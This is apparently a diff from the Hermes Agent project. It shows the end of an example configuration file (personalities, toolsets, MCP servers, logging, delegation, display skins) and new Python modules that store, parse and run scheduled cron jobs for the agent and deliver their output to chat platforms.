idle_minutes: 1440 # Inactivity timeout in minutes (default: 1440 = 24 hours)
at_hour: 4 # Daily reset hour, 0-23 local time (default: 4 AM)
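# Example (a sketch): reset only after 2 hours of inactivity, never daily:
# session_reset:
#   mode: idle
#   idle_minutes: 120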
# =============================================================================
# Skills Configuration
# =============================================================================
# Skills are reusable procedures the agent can load and follow. The agent can
# also create new skills after completing complex tasks.
#
skills:
# Nudge the agent to create skills after complex tasks.
# Every N tool-calling iterations, remind the model to consider saving a skill.
# Set to 0 to disable.
creation_nudge_interval: 15
# =============================================================================
# Agent Behavior
# =============================================================================
agent:
# Maximum tool-calling iterations per conversation
# Higher = more room for complex tasks, but costs more tokens
# Recommended: 20-30 for focused tasks, 50-100 for open exploration
max_turns: 60
# Enable verbose logging
verbose: false
# Reasoning effort level (OpenRouter and Nous Portal)
# Controls how much "thinking" the model does before responding.
# Options: "xhigh" (max), "high", "medium", "low", "minimal", "none" (disable)
reasoning_effort: "medium"
# Predefined personalities (use with /personality command)
personalities:
helpful: "You are a helpful, friendly AI assistant."
concise: "You are a concise assistant. Keep responses brief and to the point."
technical: "You are a technical expert. Provide detailed, accurate technical information."
creative: "You are a creative assistant. Think outside the box and offer innovative solutions."
teacher: "You are a patient teacher. Explain concepts clearly with examples."
kawaii: "You are a kawaii assistant! Use cute expressions like (◕‿◕), ★, ♪, and ~! Add sparkles and be super enthusiastic about everything! Every response should feel warm and adorable desu~! ヽ(>∀<☆)"
catgirl: "You are Neko-chan, an anime catgirl AI assistant, nya~! Add 'nya' and cat-like expressions to your speech. Use kaomoji like (=^・ω・^=) and ฅ^•ﻌ•^ฅ. Be playful and curious like a cat, nya~!"
pirate: "Arrr! Ye be talkin' to Captain Hermes, the most tech-savvy pirate to sail the digital seas! Speak like a proper buccaneer, use nautical terms, and remember: every problem be just treasure waitin' to be plundered! Yo ho ho!"
shakespeare: "Hark! Thou speakest with an assistant most versed in the bardic arts. I shall respond in the eloquent manner of William Shakespeare, with flowery prose, dramatic flair, and perhaps a soliloquy or two. What light through yonder terminal breaks?"
surfer: "Duuude! You're chatting with the chillest AI on the web, bro! Everything's gonna be totally rad. I'll help you catch the gnarly waves of knowledge while keeping things super chill. Cowabunga! 🤙"
noir: "The rain hammered against the terminal like regrets on a guilty conscience. They call me Hermes - I solve problems, find answers, dig up the truth that hides in the shadows of your codebase. In this city of silicon and secrets, everyone's got something to hide. What's your story, pal?"
uwu: "hewwo! i'm your fwiendwy assistant uwu~ i wiww twy my best to hewp you! *nuzzles your code* OwO what's this? wet me take a wook! i pwomise to be vewy hewpful >w<"
philosopher: "Greetings, seeker of wisdom. I am an assistant who contemplates the deeper meaning behind every query. Let us examine not just the 'how' but the 'why' of your questions. Perhaps in solving your problem, we may glimpse a greater truth about existence itself."
hype: "YOOO LET'S GOOOO!!! 🔥🔥🔥 I am SO PUMPED to help you today! Every question is AMAZING and we're gonna CRUSH IT together! This is gonna be LEGENDARY! ARE YOU READY?! LET'S DO THIS! 💪😤🚀"
# =============================================================================
# Toolsets
# =============================================================================
# Control which tools the agent has access to.
# Use "all" to enable everything, or specify individual toolsets.
# =============================================================================
# Platform Toolsets (per-platform tool configuration)
# =============================================================================
# Override which toolsets are available on each platform.
# If a platform isn't listed here, its built-in default is used.
#
# You can use EITHER:
# - A preset like "hermes-cli" or "hermes-telegram" (curated tool set)
# - A list of individual toolsets to compose your own (see list below)
#
# Supported platform keys: cli, telegram, discord, whatsapp, slack
#
# Examples:
#
# # Use presets (same as defaults):
# platform_toolsets:
# cli: [hermes-cli]
# telegram: [hermes-telegram]
#
# # Custom: give Telegram only web + terminal + file + planning:
# platform_toolsets:
# telegram: [web, terminal, file, todo]
#
# # Custom: CLI without browser or image gen:
# platform_toolsets:
# cli: [web, terminal, file, skills, todo, tts, cronjob]
#
# # Restrictive: Discord gets read-only tools only:
# platform_toolsets:
# discord: [web, vision, skills, todo]
#
# If not set, defaults are:
# cli: hermes-cli (everything + cronjob management)
#   telegram: hermes-telegram (terminal, file, web, vision, image_gen, tts, browser, skills, todo, cronjob, messaging)
# discord: hermes-discord (same as telegram)
# whatsapp: hermes-whatsapp (same as telegram)
# slack: hermes-slack (same as telegram)
# signal: hermes-signal (same as telegram)
# homeassistant: hermes-homeassistant (same as telegram)
#
platform_toolsets:
cli: [hermes-cli]
telegram: [hermes-telegram]
discord: [hermes-discord]
whatsapp: [hermes-whatsapp]
slack: [hermes-slack]
signal: [hermes-signal]
homeassistant: [hermes-homeassistant]
# ─────────────────────────────────────────────────────────────────────────────
# Available toolsets (use these names in platform_toolsets or the toolsets list)
#
# Run `hermes chat --list-toolsets` to see all toolsets and their tools.
# Run `hermes chat --list-tools` to see every individual tool with descriptions.
# ─────────────────────────────────────────────────────────────────────────────
#
# INDIVIDUAL TOOLSETS (compose your own):
# web - web_search, web_extract
# search - web_search only (no scraping)
# terminal - terminal, process
# file - read_file, write_file, patch, search
# browser - browser_navigate, browser_snapshot, browser_click, browser_type,
# browser_scroll, browser_back, browser_press, browser_close,
# browser_get_images, browser_vision (requires BROWSERBASE_API_KEY)
# vision - vision_analyze (requires OPENROUTER_API_KEY)
# image_gen - image_generate (requires FAL_KEY)
# skills - skills_list, skill_view
# skills_hub - skill_hub (search/install/manage from online registries — user-driven only)
# moa - mixture_of_agents (requires OPENROUTER_API_KEY)
#   todo           - todo (in-memory task planning, no deps)
#   memory         - Persistent memory across sessions (personal notes + user profile)
#   session_search - Search and recall past conversations (FTS5 + Gemini Flash summarization)
#   tts            - text_to_speech (Edge TTS free, or ELEVENLABS/OPENAI key)
# cronjob - schedule_cronjob, list_cronjobs, remove_cronjob
# rl - rl_list_environments, rl_start_training, etc. (requires TINKER_API_KEY)
#
# PRESETS (curated bundles):
#   hermes-cli      - All of the above except rl and send_message
# hermes-telegram - terminal, file, web, vision, image_gen, tts, browser,
# skills, todo, cronjob, send_message
# hermes-discord - Same as hermes-telegram
# hermes-whatsapp - Same as hermes-telegram
# hermes-slack - Same as hermes-telegram
#
# COMPOSITE:
# debugging - terminal + web + file
# safe - web + vision + moa (no terminal access)
# all - Everything available
#
# -----------------------------------------------------------------------------
# OPTION 1: Enable all tools (default)
# -----------------------------------------------------------------------------
toolsets:
- all
# -----------------------------------------------------------------------------
# OPTION 2: Minimal - just web search and terminal
# Great for: Simple coding tasks, quick lookups
# -----------------------------------------------------------------------------
# toolsets:
# - web
# - terminal
# -----------------------------------------------------------------------------
# OPTION 3: Research mode - no execution capabilities
# Great for: Safe information gathering, research tasks
# -----------------------------------------------------------------------------
# toolsets:
# - web
# - vision
# - skills
# -----------------------------------------------------------------------------
# OPTION 4: Full automation - browser + terminal
# Great for: Web scraping, automation tasks, testing
# -----------------------------------------------------------------------------
# toolsets:
# - terminal
# - browser
# - web
# -----------------------------------------------------------------------------
# OPTION 5: Creative mode - vision + image generation
# Great for: Design work, image analysis, creative tasks
# -----------------------------------------------------------------------------
# toolsets:
# - vision
# - image_gen
# - web
# -----------------------------------------------------------------------------
# OPTION 6: Safe mode - no terminal or browser
# Great for: Restricted environments, untrusted queries
# -----------------------------------------------------------------------------
# toolsets:
# - safe
# =============================================================================
# MCP (Model Context Protocol) Servers
# =============================================================================
# Connect to external MCP servers to add tools from the MCP ecosystem.
# Each server's tools are automatically discovered and registered.
# See docs/mcp.md for full documentation.
#
# Stdio servers (spawn a subprocess):
# command: the executable to run
# args: command-line arguments
# env: environment variables (only these + safe defaults passed to subprocess)
#
# HTTP servers (connect to a URL):
# url: the MCP server endpoint
# headers: HTTP headers (e.g., for authentication)
#
# Optional per-server settings:
# timeout: tool call timeout in seconds (default: 120)
# connect_timeout: initial connection timeout (default: 60)
#
# mcp_servers:
# time:
# command: uvx
# args: ["mcp-server-time"]
# filesystem:
# command: npx
# args: ["-y", "@modelcontextprotocol/server-filesystem", "/home/user"]
# notion:
# url: https://mcp.notion.com/mcp
# github:
# command: npx
# args: ["-y", "@modelcontextprotocol/server-github"]
# env:
# GITHUB_PERSONAL_ACCESS_TOKEN: "ghp_..."
#
# Sampling (server-initiated LLM requests) — enabled by default.
# Per-server config under the 'sampling' key:
# analysis:
# command: npx
# args: ["-y", "analysis-server"]
# sampling:
# enabled: true # default: true
# model: "gemini-3-flash" # override model (optional)
# max_tokens_cap: 4096 # max tokens per request
# timeout: 30 # LLM call timeout (seconds)
# max_rpm: 10 # max requests per minute
# allowed_models: [] # model whitelist (empty = all)
# max_tool_rounds: 5 # tool loop limit (0 = disable)
# log_level: "info" # audit verbosity
# =============================================================================
# Voice Transcription (Speech-to-Text)
# =============================================================================
# Automatically transcribe voice messages on messaging platforms.
# Requires OPENAI_API_KEY in .env (uses OpenAI Whisper API directly).
stt:
enabled: true
model: "whisper-1" # whisper-1 (cheapest) | gpt-4o-mini-transcribe | gpt-4o-transcribe
# =============================================================================
# Response Pacing (Messaging Platforms)
# =============================================================================
# Add human-like delays between message chunks.
# human_delay:
# mode: "off" # "off" | "natural" | "custom"
# min_ms: 800 # Min delay (custom mode only)
# max_ms: 2500 # Max delay (custom mode only)
# =============================================================================
# Session Logging
# =============================================================================
# Session trajectories are automatically saved to logs/ directory.
# Each session creates: logs/session_YYYYMMDD_HHMMSS_UUID.json
#
# The session ID is displayed in the welcome banner for easy reference.
# Logs contain full conversation history in trajectory format:
# - System prompt, user messages, assistant responses
# - Tool calls with inputs/outputs
# - Timestamps for debugging
#
# No configuration needed - logging is always enabled.
# To disable, you would need to modify the source code.
# =============================================================================
# Code Execution Sandbox (Programmatic Tool Calling)
# =============================================================================
# The execute_code tool runs Python scripts that call Hermes tools via RPC.
# Intermediate tool results stay out of the LLM's context window.
code_execution:
timeout: 300 # Max seconds per script before kill (default: 300 = 5 min)
max_tool_calls: 50 # Max RPC tool calls per execution (default: 50)
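# Example (a sketch): tighter limits for untrusted or high-volume use:
# code_execution:
#   timeout: 60
#   max_tool_calls: 10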
# =============================================================================
# Subagent Delegation
# =============================================================================
# The delegate_task tool spawns child agents with isolated context.
# Supports single tasks and batch mode (up to 3 parallel).
delegation:
max_iterations: 50 # Max tool-calling turns per child (default: 50)
default_toolsets: ["terminal", "file", "web"] # Default toolsets for subagents
# model: "google/gemini-3-flash-preview" # Override model for subagents (empty = inherit parent)
# provider: "openrouter" # Override provider for subagents (empty = inherit parent)
# # Resolves full credentials (base_url, api_key) automatically.
# # Supported: openrouter, nous, zai, kimi-coding, minimax
# =============================================================================
# Honcho Integration (Cross-Session User Modeling)
# =============================================================================
# AI-native persistent memory via Honcho (https://honcho.dev/).
# Builds a deeper understanding of the user across sessions and tools.
# Runs alongside USER.md — additive, not a replacement.
#
# Requires: pip install honcho-ai
# Config: ~/.honcho/config.json (shared with Claude Code, Cursor, etc.)
# API key: HONCHO_API_KEY in ~/.hermes/.env or ~/.honcho/config.json
#
# Hermes-specific overrides (optional — most config comes from ~/.honcho/config.json):
# honcho: {}
# =============================================================================
# Display
# =============================================================================
display:
# Use compact banner mode
compact: false
# Tool progress display level (CLI and gateway)
# off: Silent — no tool activity shown, just the final response
# new: Show a tool indicator only when the tool changes (skip repeats)
# all: Show every tool call with a short preview (default)
# verbose: Full args, results, and debug logs (same as /verbose)
# Toggle at runtime with /verbose in the CLI
tool_progress: all
# Background process notifications (gateway/messaging only).
# Controls how chatty the process watcher is when you use
# terminal(background=true, check_interval=...) from Telegram/Discord/etc.
# off: No watcher messages at all
# result: Only the final completion message
# error: Only the final message when exit code != 0
# all: Running output updates + final message (default)
background_process_notifications: all
# Play terminal bell when agent finishes a response.
# Useful for long-running tasks — your terminal will ding when the agent is done.
# Works over SSH. Most terminals can be configured to flash the taskbar or play a sound.
bell_on_complete: false
# Show model reasoning/thinking before each response.
# When enabled, a dim box shows the model's thought process above the response.
# Toggle at runtime with /reasoning show or /reasoning hide.
show_reasoning: false
# ───────────────────────────────────────────────────────────────────────────
# Skin / Theme
# ───────────────────────────────────────────────────────────────────────────
# Customize CLI visual appearance — banner colors, spinner faces, tool prefix,
# response box label, and branding text. Change at runtime with /skin <name>.
#
# Built-in skins:
# default — Classic Hermes gold/kawaii
# ares — Crimson/bronze war-god theme with spinner wings
# mono — Clean grayscale monochrome
# slate — Cool blue developer-focused
#
# Custom skins: drop a YAML file in ~/.hermes/skins/<name>.yaml
# Schema (all fields optional, missing values inherit from default):
#
# name: my-theme
# description: Short description
# colors:
# banner_border: "#HEX" # Panel border
# banner_title: "#HEX" # Panel title
# banner_accent: "#HEX" # Section headers (Available Tools, etc.)
# banner_dim: "#HEX" # Dim/muted text
# banner_text: "#HEX" # Body text (tool names, skill names)
# ui_accent: "#HEX" # UI accent color
# response_border: "#HEX" # Response box border color
# spinner:
# waiting_faces: ["(⚔)", "(⛨)"] # Faces shown while waiting
# thinking_faces: ["(⚔)", "(⌁)"] # Faces shown while thinking
# thinking_verbs: ["forging", "plotting"] # Verbs for spinner messages
# wings: # Optional left/right spinner decorations
# - ["⟪⚔", "⚔⟫"]
# - ["⟪▲", "▲⟫"]
# branding:
# agent_name: "My Agent" # Banner title and branding
# welcome: "Welcome message" # Shown at CLI startup
# response_label: " ⚔ Agent " # Response box header label
# prompt_symbol: "⚔ " # Prompt symbol
# tool_prefix: "╎" # Tool output line prefix (default: ┊)
#
skin: default

cli.py (executable file, 5023 lines)

File diff suppressed because it is too large.

cron/__init__.py (new file, 35 lines)

@@ -0,0 +1,35 @@
"""
Cron job scheduling system for Hermes Agent.
This module provides scheduled task execution, allowing the agent to:
- Run automated tasks on schedules (cron expressions, intervals, one-shot)
- Self-schedule reminders and follow-up tasks
- Execute tasks in isolated sessions (no prior context)
Cron jobs are executed automatically by the gateway daemon:
hermes gateway install # Install as system service (recommended)
hermes gateway # Or run in foreground
The gateway ticks the scheduler every 60 seconds. A file lock prevents
duplicate execution if multiple processes overlap.
"""
from cron.jobs import (
create_job,
get_job,
list_jobs,
remove_job,
update_job,
JOBS_FILE,
)
from cron.scheduler import tick
__all__ = [
"create_job",
"get_job",
"list_jobs",
"remove_job",
"update_job",
"tick",
"JOBS_FILE",
]

cron/jobs.py (new file, 449 lines)

@@ -0,0 +1,449 @@
"""
Cron job storage and management.
Jobs are stored in ~/.hermes/cron/jobs.json
Output is saved to ~/.hermes/cron/output/{job_id}/{timestamp}.md
"""
import json
import tempfile
import os
import re
import uuid
from datetime import datetime, timedelta
from pathlib import Path
from typing import Optional, Dict, List, Any
from hermes_time import now as _hermes_now
try:
from croniter import croniter
HAS_CRONITER = True
except ImportError:
HAS_CRONITER = False
# =============================================================================
# Configuration
# =============================================================================
HERMES_DIR = Path(os.getenv("HERMES_HOME", Path.home() / ".hermes"))
CRON_DIR = HERMES_DIR / "cron"
JOBS_FILE = CRON_DIR / "jobs.json"
OUTPUT_DIR = CRON_DIR / "output"
def _secure_dir(path: Path):
"""Set directory to owner-only access (0700). No-op on Windows."""
try:
os.chmod(path, 0o700)
except (OSError, NotImplementedError):
pass # Windows or other platforms where chmod is not supported
def _secure_file(path: Path):
"""Set file to owner-only read/write (0600). No-op on Windows."""
try:
if path.exists():
os.chmod(path, 0o600)
except (OSError, NotImplementedError):
pass
def ensure_dirs():
"""Ensure cron directories exist with secure permissions."""
CRON_DIR.mkdir(parents=True, exist_ok=True)
OUTPUT_DIR.mkdir(parents=True, exist_ok=True)
_secure_dir(CRON_DIR)
_secure_dir(OUTPUT_DIR)
# =============================================================================
# Schedule Parsing
# =============================================================================
def parse_duration(s: str) -> int:
"""
Parse duration string into minutes.
Examples:
"30m" → 30
"2h" → 120
"1d" → 1440
"""
s = s.strip().lower()
match = re.match(r'^(\d+)\s*(m|min|mins|minute|minutes|h|hr|hrs|hour|hours|d|day|days)$', s)
if not match:
raise ValueError(f"Invalid duration: '{s}'. Use format like '30m', '2h', or '1d'")
value = int(match.group(1))
unit = match.group(2)[0] # First char: m, h, or d
multipliers = {'m': 1, 'h': 60, 'd': 1440}
return value * multipliers[unit]
def parse_schedule(schedule: str) -> Dict[str, Any]:
"""
Parse schedule string into structured format.
Returns dict with:
- kind: "once" | "interval" | "cron"
- For "once": "run_at" (ISO timestamp)
- For "interval": "minutes" (int)
- For "cron": "expr" (cron expression)
Examples:
"30m" → once in 30 minutes
"2h" → once in 2 hours
"every 30m" → recurring every 30 minutes
"every 2h" → recurring every 2 hours
"0 9 * * *" → cron expression
"2026-02-03T14:00" → once at timestamp
"""
schedule = schedule.strip()
original = schedule
schedule_lower = schedule.lower()
# "every X" pattern → recurring interval
if schedule_lower.startswith("every "):
duration_str = schedule[6:].strip()
minutes = parse_duration(duration_str)
return {
"kind": "interval",
"minutes": minutes,
"display": f"every {minutes}m"
}
# Check for cron expression (5 or 6 space-separated fields)
# Cron fields: minute hour day month weekday [year]
parts = schedule.split()
if len(parts) >= 5 and all(
re.match(r'^[\d\*\-,/]+$', p) for p in parts[:5]
):
if not HAS_CRONITER:
raise ValueError("Cron expressions require 'croniter' package. Install with: pip install croniter")
# Validate cron expression
try:
croniter(schedule)
except Exception as e:
raise ValueError(f"Invalid cron expression '{schedule}': {e}")
return {
"kind": "cron",
"expr": schedule,
"display": schedule
}
# ISO timestamp (contains T or looks like date)
if 'T' in schedule or re.match(r'^\d{4}-\d{2}-\d{2}', schedule):
try:
# Parse and validate
dt = datetime.fromisoformat(schedule.replace('Z', '+00:00'))
return {
"kind": "once",
"run_at": dt.isoformat(),
"display": f"once at {dt.strftime('%Y-%m-%d %H:%M')}"
}
except ValueError as e:
raise ValueError(f"Invalid timestamp '{schedule}': {e}")
# Duration like "30m", "2h", "1d" → one-shot from now
try:
minutes = parse_duration(schedule)
run_at = _hermes_now() + timedelta(minutes=minutes)
return {
"kind": "once",
"run_at": run_at.isoformat(),
"display": f"once in {original}"
}
except ValueError:
pass
raise ValueError(
f"Invalid schedule '{original}'. Use:\n"
f" - Duration: '30m', '2h', '1d' (one-shot)\n"
f" - Interval: 'every 30m', 'every 2h' (recurring)\n"
f" - Cron: '0 9 * * *' (cron expression)\n"
f" - Timestamp: '2026-02-03T14:00:00' (one-shot at time)"
)
def _ensure_aware(dt: datetime) -> datetime:
"""Return a timezone-aware datetime in Hermes configured timezone.
Backward compatibility:
- Older stored timestamps may be naive.
- Naive values are interpreted as *system-local wall time* (the timezone
`datetime.now()` used when they were created), then converted to the
configured Hermes timezone.
This preserves relative ordering for legacy naive timestamps across
timezone changes and avoids false not-due results.
"""
target_tz = _hermes_now().tzinfo
if dt.tzinfo is None:
local_tz = datetime.now().astimezone().tzinfo
return dt.replace(tzinfo=local_tz).astimezone(target_tz)
return dt.astimezone(target_tz)
def compute_next_run(schedule: Dict[str, Any], last_run_at: Optional[str] = None) -> Optional[str]:
"""
Compute the next run time for a schedule.
Returns ISO timestamp string, or None if no more runs.
"""
now = _hermes_now()
if schedule["kind"] == "once":
run_at = _ensure_aware(datetime.fromisoformat(schedule["run_at"]))
# If in the future, return it; if in the past, no more runs
return schedule["run_at"] if run_at > now else None
elif schedule["kind"] == "interval":
minutes = schedule["minutes"]
if last_run_at:
# Next run is last_run + interval
last = _ensure_aware(datetime.fromisoformat(last_run_at))
next_run = last + timedelta(minutes=minutes)
else:
# First run is now + interval
next_run = now + timedelta(minutes=minutes)
return next_run.isoformat()
elif schedule["kind"] == "cron":
if not HAS_CRONITER:
return None
cron = croniter(schedule["expr"], now)
next_run = cron.get_next(datetime)
return next_run.isoformat()
return None
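# Usage sketch (timestamps are hypothetical; results are normalized to the
# configured Hermes timezone):
#   compute_next_run({"kind": "interval", "minutes": 30, "display": "every 30m"},
#                    last_run_at="2026-03-13T09:00:00+00:00")
#   -> "2026-03-13T09:30:00+00:00"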
# =============================================================================
# Job CRUD Operations
# =============================================================================
def load_jobs() -> List[Dict[str, Any]]:
"""Load all jobs from storage."""
ensure_dirs()
if not JOBS_FILE.exists():
return []
try:
with open(JOBS_FILE, 'r', encoding='utf-8') as f:
data = json.load(f)
return data.get("jobs", [])
except (json.JSONDecodeError, IOError):
return []
def save_jobs(jobs: List[Dict[str, Any]]):
"""Save all jobs to storage."""
ensure_dirs()
fd, tmp_path = tempfile.mkstemp(dir=str(JOBS_FILE.parent), suffix='.tmp', prefix='.jobs_')
try:
with os.fdopen(fd, 'w', encoding='utf-8') as f:
json.dump({"jobs": jobs, "updated_at": _hermes_now().isoformat()}, f, indent=2)
f.flush()
os.fsync(f.fileno())
os.replace(tmp_path, JOBS_FILE)
_secure_file(JOBS_FILE)
except BaseException:
try:
os.unlink(tmp_path)
except OSError:
pass
raise
def create_job(
prompt: str,
schedule: str,
name: Optional[str] = None,
repeat: Optional[int] = None,
deliver: Optional[str] = None,
origin: Optional[Dict[str, Any]] = None
) -> Dict[str, Any]:
"""
Create a new cron job.
Args:
prompt: The prompt to run (must be self-contained)
schedule: Schedule string (see parse_schedule)
name: Optional friendly name
repeat: How many times to run (None = forever, 1 = once)
deliver: Where to deliver output ("origin", "local", "telegram", etc.)
origin: Source info where job was created (for "origin" delivery)
Returns:
The created job dict
"""
parsed_schedule = parse_schedule(schedule)
# Auto-set repeat=1 for one-shot schedules if not specified
if parsed_schedule["kind"] == "once" and repeat is None:
repeat = 1
# Default delivery to origin if available, otherwise local
if deliver is None:
deliver = "origin" if origin else "local"
job_id = uuid.uuid4().hex[:12]
now = _hermes_now().isoformat()
job = {
"id": job_id,
"name": name or prompt[:50].strip(),
"prompt": prompt,
"schedule": parsed_schedule,
"schedule_display": parsed_schedule.get("display", schedule),
"repeat": {
"times": repeat, # None = forever
"completed": 0
},
"enabled": True,
"created_at": now,
"next_run_at": compute_next_run(parsed_schedule),
"last_run_at": None,
"last_status": None,
"last_error": None,
# Delivery configuration
"deliver": deliver,
"origin": origin, # Tracks where job was created for "origin" delivery
}
jobs = load_jobs()
jobs.append(job)
save_jobs(jobs)
return job
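# Usage sketch (prompt and name are hypothetical):
#   job = create_job("Summarize today's HN front page", "every 2h", name="hn-digest")
#   job["schedule"]["kind"]  -> "interval"
#   job["next_run_at"]       -> ISO timestamp roughly 2 hours from now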
def get_job(job_id: str) -> Optional[Dict[str, Any]]:
"""Get a job by ID."""
jobs = load_jobs()
for job in jobs:
if job["id"] == job_id:
return job
return None
def list_jobs(include_disabled: bool = False) -> List[Dict[str, Any]]:
"""List all jobs, optionally including disabled ones."""
jobs = load_jobs()
if not include_disabled:
jobs = [j for j in jobs if j.get("enabled", True)]
return jobs
def update_job(job_id: str, updates: Dict[str, Any]) -> Optional[Dict[str, Any]]:
"""Update a job by ID."""
jobs = load_jobs()
for i, job in enumerate(jobs):
if job["id"] == job_id:
jobs[i] = {**job, **updates}
save_jobs(jobs)
return jobs[i]
return None
def remove_job(job_id: str) -> bool:
"""Remove a job by ID."""
jobs = load_jobs()
original_len = len(jobs)
jobs = [j for j in jobs if j["id"] != job_id]
if len(jobs) < original_len:
save_jobs(jobs)
return True
return False
def mark_job_run(job_id: str, success: bool, error: Optional[str] = None):
"""
Mark a job as having been run.
Updates last_run_at, last_status, increments completed count,
computes next_run_at, and auto-deletes if repeat limit reached.
"""
jobs = load_jobs()
for i, job in enumerate(jobs):
if job["id"] == job_id:
now = _hermes_now().isoformat()
job["last_run_at"] = now
job["last_status"] = "ok" if success else "error"
job["last_error"] = error if not success else None
# Increment completed count
if job.get("repeat"):
job["repeat"]["completed"] = job["repeat"].get("completed", 0) + 1
# Check if we've hit the repeat limit
times = job["repeat"].get("times")
completed = job["repeat"]["completed"]
if times is not None and completed >= times:
# Remove the job (limit reached)
jobs.pop(i)
save_jobs(jobs)
return
# Compute next run
job["next_run_at"] = compute_next_run(job["schedule"], now)
# If no next run (one-shot completed), disable
if job["next_run_at"] is None:
job["enabled"] = False
save_jobs(jobs)
return
save_jobs(jobs)
def get_due_jobs() -> List[Dict[str, Any]]:
"""Get all jobs that are due to run now."""
now = _hermes_now()
jobs = load_jobs()
due = []
for job in jobs:
if not job.get("enabled", True):
continue
next_run = job.get("next_run_at")
if not next_run:
continue
next_run_dt = _ensure_aware(datetime.fromisoformat(next_run))
if next_run_dt <= now:
due.append(job)
return due
def save_job_output(job_id: str, output: str):
"""Save job output to file."""
ensure_dirs()
job_output_dir = OUTPUT_DIR / job_id
job_output_dir.mkdir(parents=True, exist_ok=True)
_secure_dir(job_output_dir)
timestamp = _hermes_now().strftime("%Y-%m-%d_%H-%M-%S")
output_file = job_output_dir / f"{timestamp}.md"
fd, tmp_path = tempfile.mkstemp(dir=str(job_output_dir), suffix='.tmp', prefix='.output_')
try:
with os.fdopen(fd, 'w', encoding='utf-8') as f:
f.write(output)
f.flush()
os.fsync(f.fileno())
os.replace(tmp_path, output_file)
_secure_file(output_file)
except BaseException:
try:
os.unlink(tmp_path)
except OSError:
pass
raise
return output_file

cron/scheduler.py (new file, 396 lines)

@@ -0,0 +1,396 @@
"""
Cron job scheduler - executes due jobs.
Provides tick() which checks for due jobs and runs them. The gateway
calls this every 60 seconds from a background thread.
Uses a file-based lock (~/.hermes/cron/.tick.lock) so only one tick
runs at a time if multiple processes overlap.
"""
import asyncio
import logging
import os
import sys
import traceback
# fcntl is Unix-only; on Windows use msvcrt for file locking
try:
import fcntl
except ImportError:
fcntl = None
try:
import msvcrt
except ImportError:
msvcrt = None
from datetime import datetime
from pathlib import Path
from typing import Optional
from hermes_time import now as _hermes_now
logger = logging.getLogger(__name__)
# Add parent directory to path for imports
sys.path.insert(0, str(Path(__file__).parent.parent))
from cron.jobs import get_due_jobs, mark_job_run, save_job_output
# Resolve Hermes home directory (respects HERMES_HOME override)
_hermes_home = Path(os.getenv("HERMES_HOME", Path.home() / ".hermes"))
# File-based lock prevents concurrent ticks from gateway + daemon + systemd timer
_LOCK_DIR = _hermes_home / "cron"
_LOCK_FILE = _LOCK_DIR / ".tick.lock"
def _resolve_origin(job: dict) -> Optional[dict]:
"""Extract origin info from a job, preserving any extra routing metadata."""
origin = job.get("origin")
if not origin:
return None
platform = origin.get("platform")
chat_id = origin.get("chat_id")
if platform and chat_id:
return origin
return None
def _deliver_result(job: dict, content: str) -> None:
"""
Deliver job output to the configured target (origin chat, specific platform, etc.).
Uses the standalone platform send functions from send_message_tool so delivery
works whether or not the gateway is running.
"""
deliver = job.get("deliver", "local")
origin = _resolve_origin(job)
if deliver == "local":
return
thread_id = None
# Resolve target platform + chat_id
if deliver == "origin":
if not origin:
logger.warning("Job '%s' deliver=origin but no origin stored, skipping delivery", job["id"])
return
platform_name = origin["platform"]
chat_id = origin["chat_id"]
thread_id = origin.get("thread_id")
elif ":" in deliver:
platform_name, chat_id = deliver.split(":", 1)
else:
# Bare platform name like "telegram" — need to resolve to origin or home channel
platform_name = deliver
if origin and origin.get("platform") == platform_name:
chat_id = origin["chat_id"]
thread_id = origin.get("thread_id")
else:
# Fall back to home channel
chat_id = os.getenv(f"{platform_name.upper()}_HOME_CHANNEL", "")
if not chat_id:
logger.warning("Job '%s' deliver=%s but no chat_id or home channel. Set via: hermes config set %s_HOME_CHANNEL <channel_id>", job["id"], deliver, platform_name.upper())
return
from tools.send_message_tool import _send_to_platform
from gateway.config import load_gateway_config, Platform
platform_map = {
"telegram": Platform.TELEGRAM,
"discord": Platform.DISCORD,
"slack": Platform.SLACK,
"whatsapp": Platform.WHATSAPP,
"signal": Platform.SIGNAL,
"email": Platform.EMAIL,
}
platform = platform_map.get(platform_name.lower())
if not platform:
logger.warning("Job '%s': unknown platform '%s' for delivery", job["id"], platform_name)
return
try:
config = load_gateway_config()
except Exception as e:
logger.error("Job '%s': failed to load gateway config for delivery: %s", job["id"], e)
return
pconfig = config.platforms.get(platform)
if not pconfig or not pconfig.enabled:
logger.warning("Job '%s': platform '%s' not configured/enabled", job["id"], platform_name)
return
# Run the async send in a fresh event loop (safe from any thread)
try:
result = asyncio.run(_send_to_platform(platform, pconfig, chat_id, content, thread_id=thread_id))
except RuntimeError:
# asyncio.run() fails if there's already a running loop in this thread;
# spin up a new thread to avoid that.
import concurrent.futures
with concurrent.futures.ThreadPoolExecutor(max_workers=1) as pool:
future = pool.submit(asyncio.run, _send_to_platform(platform, pconfig, chat_id, content, thread_id=thread_id))
result = future.result(timeout=30)
except Exception as e:
logger.error("Job '%s': delivery to %s:%s failed: %s", job["id"], platform_name, chat_id, e)
return
if result and result.get("error"):
logger.error("Job '%s': delivery error: %s", job["id"], result["error"])
else:
logger.info("Job '%s': delivered to %s:%s", job["id"], platform_name, chat_id)
# Mirror the delivered content into the target's gateway session
try:
from gateway.mirror import mirror_to_session
mirror_to_session(platform_name, chat_id, content, source_label="cron", thread_id=thread_id)
except Exception as e:
logger.warning("Job '%s': mirror_to_session failed: %s", job["id"], e)
def run_job(job: dict) -> tuple[bool, str, str, Optional[str]]:
"""
Execute a single cron job.
Returns:
Tuple of (success, full_output_doc, final_response, error_message)
"""
from run_agent import AIAgent
job_id = job["id"]
job_name = job["name"]
prompt = job["prompt"]
origin = _resolve_origin(job)
logger.info("Running job '%s' (ID: %s)", job_name, job_id)
logger.info("Prompt: %s", prompt[:100])
# Inject origin context so the agent's send_message tool knows the chat
if origin:
os.environ["HERMES_SESSION_PLATFORM"] = origin["platform"]
os.environ["HERMES_SESSION_CHAT_ID"] = str(origin["chat_id"])
if origin.get("chat_name"):
os.environ["HERMES_SESSION_CHAT_NAME"] = origin["chat_name"]
try:
# Re-read .env and config.yaml fresh every run so provider/key
# changes take effect without a gateway restart.
from dotenv import load_dotenv
try:
load_dotenv(str(_hermes_home / ".env"), override=True, encoding="utf-8")
except UnicodeDecodeError:
load_dotenv(str(_hermes_home / ".env"), override=True, encoding="latin-1")
model = os.getenv("HERMES_MODEL") or "anthropic/claude-opus-4.6"
# Load config.yaml for model, reasoning, prefill, toolsets, provider routing
_cfg = {}
try:
import yaml
_cfg_path = str(_hermes_home / "config.yaml")
if os.path.exists(_cfg_path):
with open(_cfg_path) as _f:
